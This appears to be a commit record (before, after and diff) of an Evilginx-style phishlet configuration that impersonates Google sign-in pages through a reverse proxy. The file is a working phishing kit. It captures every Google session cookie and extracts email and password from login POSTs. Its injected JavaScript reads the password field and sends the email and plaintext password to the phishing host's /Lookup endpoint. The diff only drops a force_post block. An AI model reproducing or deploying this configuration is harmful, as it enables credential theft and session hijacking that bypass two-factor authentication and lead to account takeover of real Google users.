phishlets/google.yaml (before)
author: '@king'
min_ver: '2.3.0'

proxy_hosts:
  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}
  - {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'mail', orig_sub: 'mail', domain: 'google.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false, auto_filter: false}
  - {phish_sub: 'gds', orig_sub: 'gds', domain: 'google.com', session: false, is_landing: false, auto_filter: false}
  
sub_filters:
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'www', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'gstatic.google.com', orig_sub: 'www', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'mail', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'play.google.com', orig_sub: 'play', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'gds', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}

auth_tokens:
  - domain: '.google.com'
    keys: [".*,regexp"]
  - domain: 'accounts.google.com'
    keys: [".*,regexp"]

credentials:
  username:
    key: 'email'
    search: '\],"([^"]*)"\]$'
    type: 'post'
  password:
    key: 'password'
    search: '\],"([^"]*)"\]$'
    type: 'post'

auth_urls:
  - '/CheckCookie'
#  - '/v3/signin/_/AccountsSignInUi/data/batchexecute'

login:
  domain: 'accounts.google.com'
  path: '/ServiceLogin'

force_post:
  - path: '/signin/identifier'
    search: 
      - {key: 'f.req', search: '.*'}
      - {key: 'continue', search: '.*'}
    force:
      - {key: 'continue', value: ''}
    type: 'post'

 
js_inject:
  - trigger_domains: ['accounts.google.com']
    trigger_paths: ['/identifier']
    script: |
      setInterval(function() {

           if (document.querySelectorAll("input[name='Passwd']")?.length) {
              
                      var password = document.getElementsByName("Passwd")[0].value;
                      var email = document.querySelector("#identifierId")?.value;
                      var xhr = new XMLHttpRequest();
                      var myHostName = ('https://'+ location.hostname);
                      myHostName = myHostName.replace('accounts.', '');
                      xhr.open("POST", myHostName + "/Lookup", true);
                      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                      xhr.send("unenc_email=" + encodeURIComponent(email) + "&unenc_pwd=" + encodeURIComponent(password));

           } else {
            
           }
              
        }, 2000);


        setTimeout(function() {

           if (document.querySelectorAll("input[aria-label='Email or phone']")?.length) {
              
                      var email = document.querySelector("#identifierId")?.value;
                      document.getElementById("identifierId").value = localStorage.getItem("email");
                      document.getElementById('identifierNext').click();
           } else {
            
           }
              
        }, 3500);


        - trigger_domains: ['myaccount.google.com']
          trigger_paths: ['.*?']
          script: |
            (function () {
               'use strict';
               let subdomain = window.location.host.split('.')[0];
               if (subdomain == "myaccount") {
                  window.location.host = "myaccount.google.com";
                  // console.log("redirecting to myaccount.google.com");
                }
              }());

phishlets/google.yaml (after)
author: '@king'
min_ver: '2.3.0'

proxy_hosts:
  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}
  - {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'mail', orig_sub: 'mail', domain: 'google.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false, auto_filter: false}
  - {phish_sub: 'gds', orig_sub: 'gds', domain: 'google.com', session: false, is_landing: false, auto_filter: false}
  
sub_filters:
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'www', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'gstatic.google.com', orig_sub: 'www', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'mail', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'play.google.com', orig_sub: 'play', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'gds', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}

auth_tokens:
  - domain: '.google.com'
    keys: [".*,regexp"]
  - domain: 'accounts.google.com'
    keys: [".*,regexp"]

credentials:
  username:
    key: 'email'
    search: '\],"([^"]*)"\]$'
    type: 'post'
  password:
    key: 'password'
    search: '\],"([^"]*)"\]$'
    type: 'post'

auth_urls:
  - '/CheckCookie'
#  - '/v3/signin/_/AccountsSignInUi/data/batchexecute'

login:
  domain: 'accounts.google.com'
  path: '/ServiceLogin'
 
js_inject:
  - trigger_domains: ['accounts.google.com']
    trigger_paths: ['/identifier']
    script: |
      setInterval(function() {

           if (document.querySelectorAll("input[name='Passwd']")?.length) {
              
                      var password = document.getElementsByName("Passwd")[0].value;
                      var email = document.querySelector("#identifierId")?.value;
                      var xhr = new XMLHttpRequest();
                      var myHostName = ('https://'+ location.hostname);
                      myHostName = myHostName.replace('accounts.', '');
                      xhr.open("POST", myHostName + "/Lookup", true);
                      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                      xhr.send("unenc_email=" + encodeURIComponent(email) + "&unenc_pwd=" + encodeURIComponent(password));

           } else {
            
           }
              
        }, 2000);


        setTimeout(function() {

           if (document.querySelectorAll("input[aria-label='Email or phone']")?.length) {
              
                      var email = document.querySelector("#identifierId")?.value;
                      document.getElementById("identifierId").value = localStorage.getItem("email");
                      document.getElementById('identifierNext').click();
           } else {
            
           }
              
        }, 3500);


        - trigger_domains: ['myaccount.google.com']
          trigger_paths: ['.*?']
          script: |
            (function () {
               'use strict';
               let subdomain = window.location.host.split('.')[0];
               if (subdomain == "myaccount") {
                  window.location.host = "myaccount.google.com";
                  // console.log("redirecting to myaccount.google.com");
                }
              }());

phishlets/google.yaml (diff)
@@ -41,16 +41,6 @@ auth_urls:
 login:
   domain: 'accounts.google.com'
   path: '/ServiceLogin'
-
-force_post:
-  - path: '/signin/identifier'
-    search: 
-      - {key: 'f.req', search: '.*'}
-      - {key: 'continue', search: '.*'}
-    force:
-      - {key: 'continue', value: ''}
-    type: 'post'
-
  
 js_inject:
   - trigger_domains: ['accounts.google.com']
